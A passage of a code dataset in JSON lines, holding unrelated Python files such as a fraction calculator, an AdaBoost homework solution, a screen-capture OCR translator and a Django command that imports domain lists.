numerador \"+str(i)+\"\\n\"))\n auxden = 0 \n while (auxden == 0):\n auxden=int(input(\"ingrese el denominador \"+str(i)+\"- no puede ser cero \\n\"))\n return Fraccion(auxnum,auxden)\n\nfraccion1 = carga(1)\nfraccion2 = carga(2)\n\nfraccion1.mostrar()\nfraccion2.mostrar()\nopcion = int(input(\"1. sumar \\n 2. restar \\n 3. multiplicar \\n 4. dividir \\n\"))\n\nif (opcion==1): \n resultadoSuma = fraccion1.sumar(fraccion2)\n print(\"la suma es:\")\n resultadoSuma.mostrar()\nelif(opcion ==2):\n resultadoResta = fraccion1.resta(fraccion2)\n print(\"La resta es:\")\n resultadoResta.mostrar()\nelif(opcion==3):\n resultadoMulti = fraccion1.multiplicacion(fraccion2)\n print(\"la multiplicacion es:\")\n resultadoMulti.mostrar()\nelif(opcion==4):\n resultadoDiv = fraccion1.division(fraccion2)\n print(\"La division es:\")\n resultadoDiv.mostrar()\nelse:\n print(\"error\")\n\n","sub_path":"2022/Fraccion/principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"282001577","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport numpy as np\nimport subprocess\n\na = float(input(\"Enter lattice constant a: \"))\nb = float(input(\"Enter lattice constant b: \"))\nc = float(input(\"Enter lattice constant c: \"))\ndkv = float(input(\"Enter spacing: \"))\n\"\"\"\nenter path\n\"\"\"\nb1x = (2.0*np.pi/a)*(1.0/np.sqrt(3))\nb1y = -(2.0*np.pi/a)\nb1z = 0.0\n\n\nb2x = (2.0*np.pi/a)*(1.0/np.sqrt(3))\nb2y = (2.0*np.pi/a)\nb2z = 0.0\n\nb3x = 0.0\nb3y = 0.0\nb3z = (2.0*np.pi/c)\n\nf = open('bandkpt.in','w') \nf.write(\"%f\\n\"% dkv)\nf.write(\"{} {} {}\\n\".format(b1x,b2x,b3x))\nf.write(\"{} {} {}\\n\".format(b1y,b2y,b3y))\nf.write(\"{} {} {}\\n\".format(b1z,b2z,b3z))\nf.write(\"0 -1 0 2 # M\\n\")\nf.write(\"0 0 0 1 # {/Symbol G}\\n\")\nf.write(\"1 -2 0 3 # K\\n\")\nf.write(\"0 -1 0 2 # M\\n\")\n\nf.close()\n\ncmd = subprocess.Popen('cmd.exe /C perl band_kpoint.pl bandkpt.in')\n","sub_path":"k-points/k-point_hexagonal.py","file_name":"k-point_hexagonal.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"648233855","text":"import math\nimport numpy as np\nfrom problem2 import DT,Node\n#-------------------------------------------------------------------------\n'''\n Problem 5: Boosting (on continous attributes). \n We will implement AdaBoost algorithm in this problem.\n You could test the correctness of your code by typing `nosetests -v test5.py` in the terminal.\n'''\n\n#-----------------------------------------------\nclass DS(DT):\n '''\n Decision Stump (with contineous attributes) for Boosting.\n Decision Stump is also called 1-level decision tree.\n Different from other decision trees, a decision stump can have at most one level of child nodes.\n In order to be used by boosting, here we assume that the data instances are weighted.\n '''\n #--------------------------\n @staticmethod\n def entropy(Y, D):\n '''\n Compute the entropy of the weighted instances.\n Input:\n Y: a list of labels of the instances, a numpy array of int/float/string values.\n D: the weights of instances, a numpy float vector of length n\n Output:\n e: the entropy of the weighted samples, a float scalar\n Hint: you could use np.unique(). \n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n list_y = set([Y[i] for i in range(len(Y))])\n e = 0\n for y_value in list_y:\n sub_y = D[Y == y_value]\n prob = np.sum(sub_y)\n if prob != 0:\n e += -prob * np.log2(prob)\n\n\n\n\n #########################################\n return e \n \n #--------------------------\n @staticmethod\n def conditional_entropy(Y,X,D):\n '''\n Compute the conditional entropy of y given x on weighted instances\n Input:\n Y: a list of values, a numpy array of int/float/string values.\n X: a list of values, a numpy array of int/float/string values.\n D: the weights of instances, a numpy float vector of length n\n Output:\n ce: the weighted conditional entropy of y given x, a float scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n x_list = set([X[i] for i in range(X.shape[0])])\n ce = 0.0\n\n for x_value in x_list:\n sub_y = Y[X == x_value]\n sub_d = D[X == x_value]\n dSum = np.sum(sub_d)\n if dSum != 0:\n sub_d_in = sub_d / dSum\n else:\n sub_d_in = sub_d\n temp_ce = DS.entropy(sub_y, sub_d_in)\n ce += dSum * temp_ce\n\n\n\n \n #########################################\n return ce \n\n #--------------------------\n @staticmethod\n def information_gain(Y,X,D):\n '''\n Compute the information gain of y after spliting over attribute x\n Input:\n X: a list of values, a numpy array of int/float/string values.\n Y: a list of values, a numpy array of int/float/string values.\n D: the weights of instances, a numpy float vector of length n\n Output:\n g: the weighted information gain of y after spliting over x, a float scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n\n\n\n g = DS.entropy(Y, D) - DS.conditional_entropy(Y, X, D)\n #########################################\n return g\n\n #--------------------------\n @staticmethod\n def best_threshold(X,Y,D):\n '''\n Find the best threshold among all possible cutting points in the continous attribute of X. The data instances are weighted. \n Input:\n X: a list of values, a numpy array of int/float values.\n Y: a list of values, a numpy array of int/float/string values.\n D: the weights of instances, a numpy float vector of length n\n Output:\n Output:\n th: the best threhold, a float scalar. \n g: the weighted information gain by using the best threhold, a float scalar. \n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n th = -float('inf')\n g = -1.\n ent = DS.entropy(Y, D)\n cp = DT.cutting_points(X, Y)\n # print(cp)\n # conditional entropy\n for i_cp in cp:\n if cp.size == 0: break\n X_1 = np.empty(shape=[1, 0])\n X_2 = np.empty(shape=[1, 0])\n Y_1 = np.empty(shape=[1, 0])\n Y_2 = np.empty(shape=[1, 0])\n D_1 = np.empty(shape=[1, 0])\n D_2 = np.empty(shape=[1, 0])\n for j in range(X.shape[0]):\n if X[j] <= i_cp:\n X_1 = np.append(X_1, 1)\n Y_1 = np.append(Y_1, Y[j])\n D_1 = np.append(D_1, D[j])\n else:\n X_2 = np.append(Y_2, 1)\n Y_2 = np.append(Y_2, Y[j])\n D_2 = np.append(D_2, D[j])\n\n d_sub_1_sum = np.sum(D_1)\n d_sub_2_sum = np.sum(D_2)\n if d_sub_1_sum != 0:\n d_sub_1_in = D_1 / d_sub_1_sum\n else:\n d_sub_1_in = D_1\n\n if d_sub_2_sum != 0:\n d_sub_2_in = D_2 / d_sub_2_sum\n else:\n d_sub_2_in = D_2\n temp_ent_1 = DS.entropy(Y_1, d_sub_1_in)\n temp_ent_2 = DS.entropy(Y_2, d_sub_2_in)\n\n cent = d_sub_1_sum * temp_ent_1 + d_sub_2_sum * temp_ent_2\n g_new = ent - cent\n\n if g_new > g:\n g = g_new\n th = i_cp\n\n #########################################\n return th,g \n \n #--------------------------\n def best_attribute(self,X,Y,D):\n '''\n Find the best attribute to split the node. The attributes have continous values (int/float). The data instances are weighted.\n Here we use information gain to evaluate the attributes. \n If there is a tie in the best attributes, select the one with the smallest index.\n Input:\n X: the feature matrix, a numpy matrix of shape p by n. \n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n D: the weights of instances, a numpy float vector of length n\n Output:\n i: the index of the attribute to split, an integer scalar\n th: the threshold of the attribute to split, a float scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n\n th = -float('inf')\n g = -1.\n for index in range(X.shape[0]):\n thNext, g_new = self.best_threshold(X[index, :], Y, D)\n if g_new >= g:\n g = g_new\n th = thNext\n i = index\n\n\n\n\n #########################################\n return i, th\n \n #--------------------------\n @staticmethod\n def most_common(Y,D):\n '''\n Get the most-common label from the list Y. The instances are weighted.\n Input:\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n Here n is the number data instances in the node.\n D: the weights of instances, a numpy float vector of length n\n Output:\n y: the most common label, a scalar, can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n uniqueY = np.unique(Y)\n y_dict = dict()\n\n for y in uniqueY:\n indices = np.argwhere(Y == y).flatten()\n y_dict[y] = sum(D[indices])\n\n y = max(y_dict, key=y_dict.get)\n\n\n #########################################\n return y\n \n\n #--------------------------\n def build_tree(self, X,Y,D):\n '''\n build decision stump by overwritting the build_tree function in DT class.\n Instead of building tree nodes recursively in DT, here we only build at most one level of children nodes.\n Input:\n X: the feature matrix, a numpy matrix of shape p by n. \n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n D: the weights of instances, a numpy float vector of length n\n Return:\n t: the root node of the decision stump. \n '''\n #########################################\n ## INSERT YOUR CODE HERE\n \n # if Condition 1 or 2 holds, stop splitting \n t = Node(X, Y)\n t.isleaf = False\n t.p = DS.most_common(Y, D)\n t.X = X\n t.Y = Y\n # if Condition 1 or 2 holds, stop splitting\n if DT.stop1(Y) or DT.stop2(X):\n t.isleaf = True\n return t\n\n # find the best attribute to split\n t.i, t.th = self.best_attribute(X, Y, D)\n\n # configure each child node\n t.C1, t.C2 = DT.split(t.X, t.Y, t.i, t.th)\n t.C1.isleaf = True\n t.C2.isleaf = True\n\n lessIndex = np.argwhere(X[t.i] < t.th).flatten()\n greaterIndex = np.argwhere(X[t.i] >= t.th).flatten()\n t.C1.p = DS.most_common(t.C1.Y, D[lessIndex])\n t.C2.p = DS.most_common(t.C2.Y, D[greaterIndex])\n\n\n #########################################\n return t\n \n \n\n#-----------------------------------------------\nclass AB(DS):\n '''\n AdaBoost algorithm (with contineous attributes).\n '''\n\n #--------------------------\n @staticmethod\n def weighted_error_rate(Y,Y_,D):\n '''\n Compute the weighted error rate of a decision on a dataset. \n Input:\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n Y_: the predicted class labels, a numpy array of length n. Each element can be int/float/string.\n D: the weights of instances, a numpy float vector of length n\n Output:\n e: the weighted error rate of the decision stump\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n e = np.sum(D[Y != Y_])\n\n #########################################\n return e\n\n #--------------------------\n @staticmethod\n def compute_alpha(e):\n '''\n Compute the weight a decision stump based upon weighted error rate.\n Input:\n e: the weighted error rate of a decision stump\n Output:\n a: (alpha) the weight of the decision stump, a float scalar.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n if e == 0.:\n a = 500\n elif e == 1.:\n a = -500\n else:\n a = 0.5 * np.log((1 - e) / e)\n\n\n\n #########################################\n return a\n\n #--------------------------\n @staticmethod\n def update_D(D,a,Y,Y_):\n '''\n update the weight the data instances \n Input:\n D: the current weights of instances, a numpy float vector of length n\n a: (alpha) the weight of the decision stump, a float scalar.\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n Y_: the predicted class labels by the decision stump, a numpy array of length n. Each element can be int/float/string.\n Output:\n D: the new weights of instances, a numpy float vector of length n\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n for i in range(len(Y)):\n if Y[i] == Y_[i]:\n D[i] = D[i] * np.exp(-a)\n else:\n D[i] = D[i] * np.exp(a)\n\n if sum(D) != 1 and sum(D) != 0:\n D *= 1 / sum(D)\n\n\n\n\n #########################################\n return D\n\n #--------------------------\n @staticmethod\n def step(X,Y,D):\n '''\n Compute one step of Boosting. \n Input:\n X: the feature matrix, a numpy matrix of shape p by n. \n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n D: the current weights of instances, a numpy float vector of length n\n Output:\n t: the root node of a decision stump trained in this step\n a: (alpha) the weight of the decision stump, a float scalar.\n D: the new weights of instances, a numpy float vector of length n\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n ds = DS()\n t = ds.build_tree(X, Y, D)\n Y_ = DS.predict(t, X)\n e = AB.weighted_error_rate(Y, Y_, D)\n a = AB.compute_alpha(e)\n D = AB.update_D(D, a, Y, Y_)\n\n\n #########################################\n return t,a,D\n\n \n #--------------------------\n @staticmethod\n def inference(x,T,A):\n '''\n Given a bagging ensemble of decision trees and one data instance, infer the label of the instance. \n Input:\n x: the attribute vector of a data instance, a numpy vectr of shape p.\n Each attribute value can be int/float\n T: the root nodes of decision stumps, a list of length n_tree. \n A: the weights of the decision stumps, a numpy float vector of length n_tree.\n Output:\n y: the class label, a scalar of int/float/string.\n '''\n #########################################\n\n\n y_list = list()\n for t in T:\n while (not t.isleaf):\n if x[t.i] <= t.th:\n t = t.C1\n else:\n t = t.C2\n y_list.append(t.p)\n\n list_y = list(set([y_list[i] for i in range(len(y_list))]))\n vote_obj = list_y[0]\n vote_num = 0\n for y_value in list_y:\n vote_temp = 0\n for idx in range(len(A)):\n if y_list[idx] == y_value:\n vote_temp += A[idx]\n\n if vote_temp >= vote_num:\n vote_num = vote_temp\n vote_obj = y_value\n y = vote_obj\n\n \n #########################################\n return y\n \n\n #--------------------------\n @staticmethod\n def predict(X,T,A):\n '''\n Given an AdaBoost and a dataset, predict the labels on the dataset. \n Input:\n X: the feature matrix, a numpy matrix of shape p by n. \n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n T: the root nodes of decision stumps, a list of length n_tree. \n A: the weights of the decision stumps, a numpy float vector of length n_tree.\n Output:\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n\n Y = list()\n for i in range(X.shape[1]):\n Y.append(AB.inference(X[:, i], T, A))\n Y = np.asarray(Y)\n\n \n #########################################\n return Y \n \n\n #--------------------------\n @staticmethod\n def train(X,Y,n_tree=10):\n '''\n train adaboost.\n Input:\n X: the feature matrix, a numpy matrix of shape p by n. \n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n. Each element can be int/float/string.\n n_tree: the number of trees in the ensemble, an integer scalar\n Output:\n T: the root nodes of decision stumps, a list of length n_tree. \n A: the weights of the decision stumps, a numpy float vector of length n_tree.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n A = np.zeros(n_tree)\n D = np.ones(len(Y)) / len(Y)\n # iteratively build decision stumps\n\n T = list()\n for i in range(n_tree):\n t, a, D = AB.step(X, Y, D)\n T.append(t)\n A[i] = a\n\n # initialize weight as 1/n\n\n # iteratively build decision stumps\n\n #########################################\n return T, A\n \n\n\n\n \n","sub_path":"hw3/problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":17431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"393704939","text":"from tkinter import *\nfrom tkinter.ttk import *\nfrom serial import Serial\nfrom serial.tools import list_ports\n\ndef foo(event):#function called when '<>' event is triggered\n print(v.get())#how to access to combobox selected item\n\n\nroot = Tk()\nroot.wm_geometry(\"400x300\")\nv = StringVar()#a string variable to hold user selection\noptions=list_ports.comports()\nframe = Frame(root)\nframe.pack()\ncombo = Combobox(root,textvariable=v, values=options)\ncombo.bind('<>',foo)#binding of user selection with a custom callback\ncombo.pack()\nroot.mainloop()","sub_path":"SerialInterface/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"229347505","text":"from flask import Flask,request,Response\nfrom helper.add_resource import add_endpoint\nfrom workers.ichigo import sasuke\n\ntrabajador = sasuke()\ndefault = Flask(__name__)\n\n# @default.route('/', methods=['GET'])\ndef exit():\n 'Display registered routes'\n rules = []\n for rule in default.url_map.iter_rules():\n methods = ','.join(sorted(rule.methods))\n rules.append((rule.endpoint, methods, str(rule)))\n for endpoint, methods, rule in sorted(rules):\n route = '{:50s} {:25s} {}'.format(endpoint, methods, rule)\n print(route)\n\n print(\"\\n\\n\")\n str1 = ' \\n
'.join(( endpoint+\" => \"+methods+\"(\"+rule+\")\" ) for endpoint, methods, rule in rules)\n return str1\n\nadd_endpoint(clase=trabajador,funcion=trabajador.ejemplo_funcion, metodos=['post','get'],flask=default)\nadd_endpoint(clase=trabajador,funcion=trabajador.ejemplo_funcion2, metodos=['post','get'],flask=default)\ndefault.run(host='0.0.0.0', debug='1', port='9002')\nprint()\n","sub_path":"flask_using_class/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"551552909","text":"import ctypes\nimport sys\n\nimport cv2\nimport numpy as np\n\nfrom PIL import ImageGrab\nfrom PIL.ImageQt import ImageQt\nfrom pytesseract import *\n\nfrom PyQt5 import QtCore, QtWidgets, QtGui\nfrom PyQt5.QtGui import QCursor, QImage, QPainter, QColor, QPen, QBrush, QFont\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt, QSize, QRect\n\nimport papagoApi\n\nuser32 = ctypes.windll.user32\nscreenWidth = user32.GetSystemMetrics(0)\nscreenHeight = user32.GetSystemMetrics(1)\n\n# window error log\ndef catch_exceptions(t, val, tb):\n # QMessageBox.critical(None, \"An exception was raised\", \"Exception type: {}\".format(t))\n old_hook(t, val, tb)\n\nold_hook = sys.excepthook\nsys.excepthook = catch_exceptions\n\nclass CaptureWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n captureImage = ImageGrab.grab(bbox=(0, 0, screenWidth, screenHeight))\n self.captureImage = ImageQt(captureImage)\n\n # cv2.destroyAllWindows()\n # cv2.namedWindow('cvImage')\n # cv2.imshow('cvImage', cv2.cvtColor(np.array(captureImage), cv2.COLOR_BGR2RGB)) # 화면을 보여준다.\n\n self.sX = 0\n self.sY = 0\n self.eX = 0\n self.eY = 0\n\n self.drawing = False\n\n self.translatedText = \"\"\n self.translatedTextList = None\n self.drawingText = False\n\n self.initUI()\n\n\n def initUI(self):\n self.setWindowTitle('My First Application')\n\n # 투명 배경색\n # self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n self.setWindowFlag(QtCore.Qt.FramelessWindowHint) # 프레임바 제거\n self.setWindowFlag(QtCore.Qt.WindowStaysOnTopHint) # 항상 위에 뜨도록\n self.setFocusPolicy(QtCore.Qt.StrongFocus)\n\n self.move(0, 0)\n self.resize(screenWidth, screenHeight)\n self.setFocus(True)\n self.activateWindow()\n self.raise_()\n self.show()\n\n def paintEvent(self, e):\n painter = QPainter(self) # window painter get\n painter.begin(self)\n\n painter.drawImage(self.rect(), self.captureImage, self.captureImage.rect()) # window painter에 전체 스크린샷찍은 image draw\n\n if self.sX != 0 and self.sY != 0 and self.eX != 0 and self.eY != 0 :\n painter.setPen(QPen(QColor(255, 0, 0, 255), 1))\n painter.drawRect(self.sX < self.eX and self.sX or self.eX,\n self.sY < self.eY and self.sY or self.eY,\n abs(self.eX-self.sX),\n abs(self.eY-self.sY))\n\n if self.drawingText:\n fontSize = 15\n margin = 10\n boxHeight = fontSize + (margin * 2)\n boxWidth = fontSize * len(self.translatedTextList[0])\n\n length = len(self.translatedTextList)\n index = 0\n\n for text in self.translatedTextList:\n boxWidth = boxWidth < fontSize * len(text) and boxWidth or fontSize * len(text)\n boxWidth = boxWidth * 2\n for text in self.translatedTextList:\n painter.setPen(QColor(255,255,255))\n painter.setBrush(QColor(255, 255, 255))\n painter.drawRect(self.sX,\n (self.eY + (boxHeight*length) > screenHeight and self.sY - ((index+1)*boxHeight) or self.eY + (index*boxHeight)),\n boxWidth,\n fontSize + (margin * 2))\n\n painter.setPen(QColor(0,0,0))\n painter.setFont(QFont('나눔명조', fontSize))\n painter.drawText(self.sX + margin,\n (self.eY + (boxHeight*length) > screenHeight and (self.sY - margin) - (index*boxHeight) or (self.eY + fontSize + margin) + (index*boxHeight)),\n text)\n index = index + 1\n\n painter.end()\n\n def keyPressEvent(self, e):\n if e.key() == Qt.Key_Escape: # esc 종료\n cv2.destroyAllWindows()\n self.close()\n\n def mousePressEvent(self, e):\n if e.button() == Qt.LeftButton:\n self.drawing = True\n self.drawingText = False\n self.sX = e.pos().x()\n self.sY = e.pos().y()\n self.eX = e.pos().x()\n self.eY = e.pos().y()\n\n def mouseMoveEvent(self, e):\n if (e.buttons() & Qt.LeftButton) & self.drawing:\n self.eX = e.pos().x()\n self.eY = e.pos().y()\n\n self.update() # paintEvent 호출\n\n def mouseReleaseEvent(self, e):\n if e.button() == Qt.LeftButton:\n if (self.sX == self.eX) or (self.sY == self.eY) or (abs(self.eX - self.sX) < 10) or (abs(self.eY - self.sY) < 10):\n return\n\n self.eX = e.pos().x()\n self.eY = e.pos().y()\n\n # 테두리 1px 빼고 캡처\n cvImage = self.captureImage.copy(self.sX < self.eX and self.sX or self.eX,\n self.sY < self.eY and self.sY or self.eY,\n abs(self.eX-self.sX),\n abs(self.eY-self.sY)).convertToFormat(4)\n cvW = cvImage.width()\n cvH = cvImage.height()\n ptr = cvImage.bits()\n ptr.setsize(cvImage.byteCount())\n arr = np.array(ptr).reshape(cvH, cvW, 4)\n img = cv2.cvtColor(arr, cv2.COLOR_BGR2GRAY)\n cv2.imshow('gray img', img)\n\n # cv2.destroyAllWindows()\n # cv2.namedWindow('cvImage')\n # cv2.imshow('cvImage', img) # 화면을 보여준다.\n\n img = cv2.resize(img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)\n (thresh, img) = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n cv2.imshow('OTSU img', img)\n\n out_img = cv2.GaussianBlur(img, (3, 3), 0)\n (thresh, out_img) = cv2.threshold(out_img, 127, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n cv2.imshow('cvImage', out_img)\n\n self.translatedText = image_to_string(out_img, config='--tessdata-dir \"tessdata\" -l eng --oem 3 --psm 3')\n print(\"translatedText1: \", self.translatedText)\n self.translatedText = self.translatedText.replace(\"[^a-zA-Z\\s]\", \"\") # 영어, 공백 빼고 다 제거\n\n if not self.translatedText.strip() == \"\" :\n # self.translatedText = papagoApi.translate(self.translatedText) # 번역\n #\n self.translatedTextList = self.translatedText.split('\\n') # 줄바꿈 split\n # print(\"translatedText2: \", self.translatedTextList)\n\n self.drawingText = True\n self.update() # paintEvent 호출\n self.drawing = False\n","sub_path":"captureWindow.py","file_name":"captureWindow.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"225298668","text":"import numpy as np\nimport tensorboardX\nimport os\nfrom typing import List,Dict,Tuple\nnp.random.seed(sum(map(ord, \"aesthetics\")))\n\nclass ResultStruct(object):\n\tdef __init__(self,path:str, resultdict=None):\n\t\tif resultdict is None:\n\t\t\tself.resultdict = {}\n\t\telse:\n\t\t\tself.resultdict = resultdict\n\t\tself.writer = None\n\t\tself.trial = None\n\t\tself.path_str = path\n\n\tdef set_result_dir(self):\n\t\tprint('Deprecated !!!!!!!!!')\n\t\tinput('Do not continue')\n\t\t# if os.path.exists(RESULT_ROOT_DIR):\n\t\t# \tprint('res dir exists')\n\t\t# else:\n\t\t# \tprint('Result dir not found: Creating Result directory')\n\t\t# \tself.mk_dir(RESULT_ROOT_DIR)\n\t\t# path = os.path.join(*self.path_list)\n\t\t# if not os.path.exists(path):\n\t\t# \traise Exception('Path does not exist')\n\t\t# trial = 0\n\t\t# full_path=None\n\t\t# while (True):\n\t\t# \tfull_path = os.path.join(path, str(trial))\n\t\t# \tif os.path.exists((full_path)):\n\t\t# \t\ttrial += 1\n\t\t# \t\tcontinue\n\t\t# \telse:\n\t\t# \t\tos.mkdir(full_path)\n\t\t# \t\tbreak\n\n\t\treturn None#full_path\n\n\tdef add_epoch_res_dict(self,resdict:dict,epoch,write):\n\t\tfor i,key in enumerate(resdict.keys()):\n\t\t\tif key in self.resultdict.keys():\n\t\t\t\tself.resultdict[key].append(resdict[key])\n\t\t\telse:\n\t\t\t\tself.resultdict[key] = [resdict[key]]\n\t\t\tif write:\n\t\t\t\tif self.writer is None:\n\t\t\t\t\tself.writer = tensorboardX.SummaryWriter(self.path_str)\n\t\t\t\tself.writer.add_scalar(key,resdict[key],epoch)\n\n\n\n\t@staticmethod\n\tdef write_res_dict(resdict:dict,path:str):\n\t\twriter = tensorboardX.SummaryWriter(path)\n\t\tfor key in resdict.keys():\n\t\t\tlist_val = resdict[key]\n\t\t\tfor epoch,val in enumerate(list_val):\n\t\t\t\twriter.add_scalar(key,val,epoch)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"resultutils/resultstructs.py","file_name":"resultstructs.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"372619007","text":"from .base_controller import BaseController\nfrom MonitoredSystem.services.mongodb_service import MongoDBService\nfrom MonitoredSystem.utils import reformat_response\n\nservice = MongoDBService()\n\n\nclass MongoDBController(BaseController):\n def __int__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n @staticmethod\n @reformat_response\n def get(target_name):\n result = service.mongodb_stat(target_name)\n if result:\n if result[\"query\"] is True:\n return {\"code\": \"00000\", \"data\": result[\"data\"]}\n else:\n return {\"code\": \"10003\"}\n else:\n return {\"code\": \"10002\"}\n","sub_path":"MonitoredSystem/controllers/mongodb_controller.py","file_name":"mongodb_controller.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"279000685","text":"\"\"\"\nRe-write this NumPy code so that it is vectorized.\nie. replace the for loops with only NumPy array operations.\n\nIt might be useful to work this out with a pen and paper before writing the answer.\n\"\"\"\nimport numpy as np\n\n# A matrix defining how different locations (home, work, school) infect other people.\n# Rows are infectors, columns are infectees.\ninfect_matrix = np.array([\n [0.9, 0.05, 0.05],\n [0.05, 0.9, 0.05],\n [0.05, 0.05, 0.9],\n])\n\n# Compartments of people (home, work, school).\ninfectors = np.array([10, 19, 35]) # people who can infect other people\n\ninfected = np.zeros_like(infectors) # number of people who got infected\n\nfor infectee_idx in range(3):\n for infector_idx in range(3):\n infect_factor = infect_matrix[infector_idx, infectee_idx]\n num_infectors = infectors[infector_idx]\n infected[infectee_idx] += infect_factor * num_infectors\n\nprint(\"Number of people infected (home, work, school):\", infected)\n","sub_path":"part_3_2.py","file_name":"part_3_2.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"233203536","text":"# Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute.\n# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).\n\"\"\"\nCreated on 2020-04-27 12:29\n\n@author: a002028\n\"\"\"\nimport os\nimport time\nfrom sirena.session import Session\nfrom sirena.plotting.widgets import Plot\n\n\nif __name__ == '__main__':\n session_obj = Session(\n reader='wiski',\n station_source='samsa',\n start_time='1700-01-01',\n end_time='2020-12-31',\n )\n\n selected_dataset = 'annual_RH2000'\n print('Read data..')\n start_time = time.time()\n dfs = session_obj.read(\n all_stations=True,\n datasets=[selected_dataset],\n )\n print(\"Data extracted--%.3f sec\" % (time.time() - start_time))\n\n stats = session_obj.get_statistics(\n dfs[selected_dataset],\n stats_for_year=None,\n parameter='RH2000_Year.Mean'\n )\n\n # session_obj.update_station_info()\n\n pp = Plot(\n stations=session_obj.stations,\n statistics=stats,\n output_filename=os.path.join(\n session_obj.settings.base_directory,\n \"export\",\n \"SMISK_VIZ_tst.html\"\n )\n )\n\n pp.show_plot()\n","sub_path":"sirena/tests/test_db_to_plot.py","file_name":"test_db_to_plot.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"171745352","text":"import gzip\nimport os\n\nfrom django.conf import settings\n\nfrom common.command import Command\nfrom common.models import Domain\nfrom common.thread import Thread\nfrom common.utils import chunks\n\n\nclass Worker(Thread):\n\n def run(self):\n count = self.args[0]\n full_names = self.kwargs.get('full_names')\n length = len(full_names)\n self.info('Worker %d: %d names' % (count, length))\n\n domains = [Domain(full_name=full_name) for full_name in full_names]\n\n self.info('Worker %d: %d domains creating' % (count, length))\n Domain.objects.bulk_create(domains)\n self.info('Worker %d: %d domains created' % (count, length))\n\n return\n\n\nclass Command(Command):\n help = 'Add domains list from wwws.io'\n chunk_size = 100000\n\n def add_arguments(self, parser):\n parser.add_argument('num_workers', type=int)\n\n def handle(self, *args, **options):\n self.info('Adding global domains list')\n num_workers = int(options.get('num_workers'))\n\n file_path = os.path.join(settings.DOWNLOADS, 'wwws/')\n files = list(os.walk(file_path))[0][2]\n\n domain_files = [fi for fi in files\n if fi.endswith('.txt.gz')]\n # file_path = os.path.join(settings.DOWNLOADS, 'wwws/',\n # '%s_full.txt.gz' % (tld))\n # store_path = os.path.join(settings.DOWNLOADS,\n # 'domains/%s.trie' % (tld))\n\n for domain_file in domain_files:\n self.info(domain_file)\n tld = domain_file[:domain_file.index('_')]\n\n domain_file = os.path.join(file_path, domain_file)\n to_add = []\n self.info('Starting %s' % (tld))\n with gzip.open(domain_file, 'rt') as f:\n to_add = [domain[:-1] for domain in f]\n\n length = len(to_add)\n\n self.info('Starting to process %d domains' % (length))\n\n count = 0\n subl_count = 0\n chunk_size = min(int(length/num_workers), self.chunk_size)\n for subl in chunks(to_add, chunk_size * num_workers):\n threads = []\n for full_names in chunks(subl, chunk_size):\n count += 1\n worker = Worker(args=(count,),\n kwargs={'full_names': full_names})\n threads.append(worker)\n\n for thread in threads:\n thread.start()\n\n # Wait until all threads are done\n for thread in threads:\n thread.join()\n\n subl_count += 1\n self.info('Subl: %d' % (subl_count))\n\n 